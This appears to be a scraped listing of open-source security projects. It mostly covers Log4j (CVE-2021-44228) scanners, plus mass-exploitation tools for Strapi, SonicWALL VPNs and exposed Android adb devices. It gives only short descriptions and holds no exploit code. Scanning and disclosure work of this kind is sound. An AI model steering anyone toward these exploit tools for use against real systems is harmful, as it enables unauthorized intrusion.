Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Mitiga 13 Jan 4, 2022
Testinfra test your infrastructures

Testinfra test your infrastructure Latest documentation: https://testinfra.readthedocs.io/en/latest About With Testinfra you can write unit tests in P

pytest-dev 2.1k Jan 7, 2023
A simple automatic tool for finding vulnerable log4j hosts

Log4Scan A simple automatic tool for finding vulnerable log4j hosts Installation pip3 install -r requirements.txt Usage usage: log4scan.py [-h] (-f FI

Federico Rapetti 20018955 6 Mar 10, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 8, 2022
Python based framework providing a simple and intuitive framework for algorithmic trading

Harvest is a Python based framework providing a simple and intuitive framework for algorithmic trading. Visit Harvest's website for details, tutorials

null 100 Jan 3, 2023
PyTorch framework A simple and complete framework for PyTorch, providing a variety of data loading and simple task solutions that are easy to extend and migrate

PyTorch framework A simple and complete framework for PyTorch, providing a variety of data loading and simple task solutions that are easy to extend and migrate

Cong Cai 12 Dec 19, 2021
Automatic self-diagnosis program (python required)Automatic self-diagnosis program (python required)

auto-self-checker 자동으로 자가진단 해주는 프로그램(python 필요) 중요 이 프로그램이 실행될때에는 절대로 마우스포인터를 움직이거나 키보드를 건드리면 안된다(화면인식, 마우스포인터로 직접 클릭) 사용법 프로그램을 구동할 폴더 내의 cmd창에서 pip

null 1 Dec 30, 2021
SonicWALL SSL-VPN Web Server Vulnerable Exploit

SonicWALL SSL-VPN Web Server Vulnerable Exploit

null 44 Nov 15, 2022
The tool helps to find hidden parameters that can be vulnerable or can reveal interesting functionality that other hunters miss.

The tool helps to find hidden parameters that can be vulnerable or can reveal interesting functionality that other hunters miss. Greater accuracy is achieved thanks to the line-by-line comparison of pages, comparison of response code and reflections.

null 197 Nov 14, 2022
adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

null 136 Jan 2, 2023
OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa

Marco Simioni 13 Jul 13, 2022
Proof of concept to check if hosts are vulnerable to CVE-2021-41773

CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV

Jordan Jay 43 Nov 9, 2022
OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

cckuailong 560 Dec 23, 2022
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

lfama 8 Feb 27, 2022